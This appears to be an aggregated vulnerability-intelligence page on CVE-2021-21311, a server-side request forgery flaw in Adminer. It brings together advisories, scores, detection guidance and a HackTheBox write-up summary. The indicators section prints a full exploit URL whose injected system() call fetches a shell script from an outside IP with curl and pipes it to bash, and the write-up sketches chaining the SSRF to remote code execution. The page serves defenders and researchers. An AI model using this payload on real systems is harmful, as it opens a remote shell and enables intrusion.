CVE-2021-21311
published 2021-02-11CVE-2021-21311: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery…
PriorityP185high7.2CVSS 3.1
AVNACLPRNUINSCCLILAN
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-10-20
Exploited in the wild
EPSS
90.46%
99.8th percentile
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
Affected
12 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adminer | adminer | >= 0 < 4.7.9-1 | 4.7.9-1 |
| adminer | adminer | >= 0 < 4.7.9-1 | 4.7.9-1 |
| adminer | adminer | >= 0 < 4.7.9-1 | 4.7.9-1 |
| adminer | adminer | >= 0 < 4.7.9-1 | 4.7.9-1 |
| adminer | adminer | >= 0 < 4.2.1-1ubuntu1+esm1 | 4.2.1-1ubuntu1+esm1 |
| adminer | adminer | >= 0 < 4.6.2-1ubuntu0.1~esm1 | 4.6.2-1ubuntu0.1~esm1 |
| adminer | adminer | >= 0 < 4.7.6-1ubuntu0.1~esm1 | 4.7.6-1ubuntu0.1~esm1 |
| adminer | adminer | >= 4.0.0 < 4.7.9 | 4.7.9 |
| debian | adminer | < adminer 4.7.9-1 (bookworm) | adminer 4.7.9-1 (bookworm) |
| debian | debian_linux | — | — |
| vrana | adminer | — | — |
| vrana | adminer | >= 0 < 4.7.9 | 4.7.9 |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://localhost:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.14:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json↗
- →The SSRF exploit works by triggering a 301 redirect from an attacker-controlled HTTP server; monitor for outbound HTTP requests from the Adminer server to attacker-controlled IPs, particularly with Authorization: Basic headers ↗
- →The SSRF is triggered via the `server` POST parameter in Adminer login requests; detect POST requests to Adminer with non-localhost or external values in the `auth[server]` field ↗
- →Exploitation chains the Adminer SSRF (CVE-2021-21311) with OpenTSDB RCE (CVE-2020-35476) via the `yrange` parameter containing a `system()` call; detect HTTP requests to OpenTSDB `/q` endpoint with `yrange` containing shell metacharacters ↗
- →Adminer SSRF affects versions 4.0.0 through 4.7.8 (all-drivers bundle adminer.php); detect presence of Adminer versions below 4.7.9 via HTTP response headers or page content ↗
- →The SSRF allows unauthenticated attackers to redirect Adminer to internal services; monitor for Adminer processes making connections to internal/RFC1918 addresses or link-local addresses (e.g. 169.254.169.254) ↗
- ·Only Adminer installations using the all-drivers bundle (adminer.php) are vulnerable; single-driver builds are not affected ↗
- ·The exploit PoC (ssrf.py) requires the attacker to run a listener HTTP server that issues a 301 redirect to the internal target; the attacker host must be reachable from the Adminer server ↗
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
nvdv2.06.4MEDIUMAV:N/AC:L/Au:N/C:P/I:P/A:N
osv7.2HIGH
vulncheck7.2HIGH
cisa7.2HIGH
vendor_debian7.2HIGH
vendor_ubuntu6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
adminer vulnerabilities
osv·2022-06-03·CVSS 6.1
CVE-2020-35572 [MEDIUM] adminer vulnerabilities
adminer vulnerabilities
It was discovered that Adminer did not escape data in the history parameter
of the default URI. A remote attacker could possibly use this issue to perform
cross-site scripting (XSS) attacks. This issue only affected Ubuntu 20.04 ESM.
(CVE-2020-35572)
Adam Crosser and Brian Sizemore discovered that Adminer incorrectly handled
redirection requests to internal servers. An unauthenticated remote attacker
could possibly use this to perform a server-side request forgery attack and
expose sensitive information. (CVE-2021-21311)
It was discovered that Adminer was incorrectly escaping data in the doc_link
function. A remote attacker could possibly use this issue to perform cross-site
scripting (XSS) attacks. This issue only affected Ubuntu 18.04 ESM and
Ubuntu 20.04 ESM.
OSV
SSRF in adminer
osv·2021-02-11
CVE-2021-21311 [HIGH] SSRF in adminer
SSRF in adminer
### Impact
Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
### Patches
Patched by ccd2374b, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9).
### Workarounds
* Use a single driver version (e.g. `adminer-mysql.php`).
* Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/).
### References
https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
### For more information
If you have any questions or comments about this advisory:
* Comment at ccd2374b.
GHSA
SSRF in adminer
ghsa·2021-02-11
CVE-2021-21311 [HIGH] CWE-918 SSRF in adminer
SSRF in adminer
### Impact
Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
### Patches
Patched by ccd2374b, included in version [4.7.9](https://github.com/vrana/adminer/releases/tag/v4.7.9).
### Workarounds
* Use a single driver version (e.g. `adminer-mysql.php`).
* Protect access to Adminer also by other means, e.g. by HTTP password, IP address limiting or by OTP [plugin](https://www.adminer.org/plugins/).
### References
https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
### For more information
If you have any questions or comments about this advisory:
* Comment at ccd2374b.
OSV
CVE-2021-21311: Adminer is an open-source database management in a single PHP file
osv·2021-02-11·CVSS 7.2
CVE-2021-21311 [HIGH] CVE-2021-21311: Adminer is an open-source database management in a single PHP file
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
VulnCheck
Adminer Server-Side Request Forgery Vulnerability
vulncheck·2021·CVSS 7.2
CVE-2021-21311 [HIGH] CWE-918 Adminer Server-Side Request Forgery Vulnerability
Adminer Server-Side Request Forgery Vulnerability
Adminer contains a server-side request forgery vulnerability that, when exploited, allows a remote attacker to obtain potentially sensitive information.
Affected: Adminer Adminer
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://cloud.google.com/blog/topics/threat-intelligence/cloud-metadata-abuse-unc2903; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.recordedfuture.com/blog/september-2025-cve-landscape; https://www.rapid7.com/cdn/assets/bltbd2f1cd70f9e3e7f/691360b9c91291146f1a5308/threat-landscape-report-q3-2025.pdf; https
CISA
Adminer Server-Side Request Forgery Vulnerability
cisa·2025-09-29·CVSS 7.2
CVE-2021-21311 [HIGH] CWE-918 Adminer Server-Side Request Forgery Vulnerability
Vulnerability: Adminer Server-Side Request Forgery Vulnerability
Affected: Adminer Adminer
Adminer contains a server-side request forgery vulnerability that, when exploited, allows a remote attacker to obtain potentially sensitive information.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 ; https://nvd.nist.gov/vuln/detail/CVE-2021-21311
Remediation Due Date: 2025-10-20
Ubuntu
Adminer vulnerabilities
vendor_ubuntu·2022-06-03·CVSS 6.1
CVE-2021-21311 [MEDIUM] Adminer vulnerabilities
Title: Adminer vulnerabilities
Summary: Several security issues were fixed in Adminer.
It was discovered that Adminer did not escape data in the history parameter
of the default URI. A remote attacker could possibly use this issue to perform
cross-site scripting (XSS) attacks. This issue only affected Ubuntu 20.04 ESM.
(CVE-2020-35572)
Adam Crosser and Brian Sizemore discovered that Adminer incorrectly handled
redirection requests to internal servers. An unauthenticated remote attacker
could possibly use this to perform a server-side request forgery attack and
expose sensitive information. (CVE-2021-21311)
It was discovered that Adminer was incorrectly escaping data in the doc_link
function. A remote attacker could possibly use this issue to perform cross-site
scripting (XSS) attacks.
Debian
CVE-2021-21311: adminer - Adminer is an open-source database management in a single PHP file. In adminer f...
vendor_debian·2021·CVSS 7.2
CVE-2021-21311 [HIGH] CVE-2021-21311: adminer - Adminer is an open-source database management in a single PHP file. In adminer f...
Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
Scope: local
bookworm: resolved (fixed in 4.7.9-1)
bullseye: resolved (fixed in 4.7.9-1)
forky: resolved (fixed in 4.7.9-1)
sid: resolved (fixed in 4.7.9-1)
trixie: resolved (fixed in 4.7.9-1)
No detection rules found.
Nuclei
Adminer <4.7.9 - Server-Side Request Forgery
nuclei·CVSS 7.2
CVE-2021-21311 [HIGH] Adminer <4.7.9 - Server-Side Request Forgery
Adminer 400 - Bad Request"
- " 400 - Bad Request "
condition: or
- type: status
status:
- 403
# digest: 4a0a00473045022100e16cd237e6f0e2672326dd70078f7338476b1de74253328c75f37bdbb46592f50220751001d87c79ab6fd5d4180c5f9f07425915bc3660a8b189b292de7bf41ddf0f:922c64590222798bb761d5b6d8e72950
Tenable
Identifying Server Side Request Forgery: How Tenable.io Web Application Scanning Can Help
blogs_tenable·2021-11-18
Identifying Server Side Request Forgery: How Tenable.io Web Application Scanning Can Help
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Recorded Future
September 2025 CVE Landscape
blogs_recorded_future·CVSS 7.2
[HIGH] September 2025 CVE Landscape
# September 2025 CVE Landscape
In September 2025, Recorded Future’s Insikt Group® identified sixteen high-impact vulnerabilities that should be prioritized for remediation. This represents a decrease from the eighteen identified in August, with the number of Very Critical vulnerabilities also decreasing (11) month over month.
These vulnerabilities have affected the following vendors: Sudo, Libraesva, Fortra, Cisco, Adminer, Google, Dassault Systèmes, Linux, Android, Sitecore, TP-Link, and Meta Platforms.
September was dominated by flaws in Cisco and TP-Link, which together represented six of the sixteen vulnerabilities. Cisco’s IOS, IOS XE, and Secure Firewall products were affected by flaws, including stack-based and classic buffer overflows (CWE-121, CWE-120) and missing authorization
Recorded Future
September 2025 CVE Landscape
blogs_recorded_future·CVSS 7.2
[HIGH] September 2025 CVE Landscape
## September 2025 CVE Landscape
In September 2025, Recorded Future’s Insikt Group® identified sixteen high-impact vulnerabilities that should be prioritized for remediation. This represents a decrease from the eighteen identified in August, with the number of Very Critical vulnerabilities also decreasing (11) month over month.
These vulnerabilities have affected the following vendors: Sudo, Libraesva, Fortra, Cisco, Adminer, Google, Dassault Systèmes, Linux, Android, Sitecore, TP-Link, and Meta Platforms.
September was dominated by flaws in Cisco and TP-Link, which together represented six of the sixteen vulnerabilities. Cisco’s IOS, IOS XE, and Secure Firewall products were affected by flaws, including stack-based and classic buffer overflows (CWE-121, CWE-120) and missing authorizatio
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
AdmirerToo / README
ctf_writeups·CVSS 9.8
CVE-2021-21311 [CRITICAL] AdmirerToo / README
# AdmirerToo - HackTheBox - Writeup
Linux, 40 Base Points, Hard
## Machine
## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22``` and ```80```.
***User***: By reading the HTML source of ```403``` pages we found vhost ```admirer-gallery.htb```, Found ```Adminer``` on ```db.admirer-gallery.htb```, Found Admier SSRF (```CVE-2021-21311```), Using the SSRF we access to internal port ```4242``` and found that is ```openTSDB```, Using ```CVE-2020-35476``` we get RCE and we get a reverse shell as ```opentsb``` user, Enumerate and found ```/var/www/adminer/plugins/data/servers.php``` which contains the password of ```jennifer``` user.
***Root***: Found ```fail2ban``` and ```openCATS``` running of the target machine on port ```8080```,
https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdfhttps://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6https://lists.debian.org/debian-lts-announce/2021/03/msg00002.htmlhttps://packagist.org/packages/vrana/adminerhttps://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdfhttps://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6https://lists.debian.org/debian-lts-announce/2021/03/msg00002.htmlhttps://packagist.org/packages/vrana/adminerhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-21311
2021-02-11
Published
2025-09-29
Added to CISA KEV
Exploited in the wild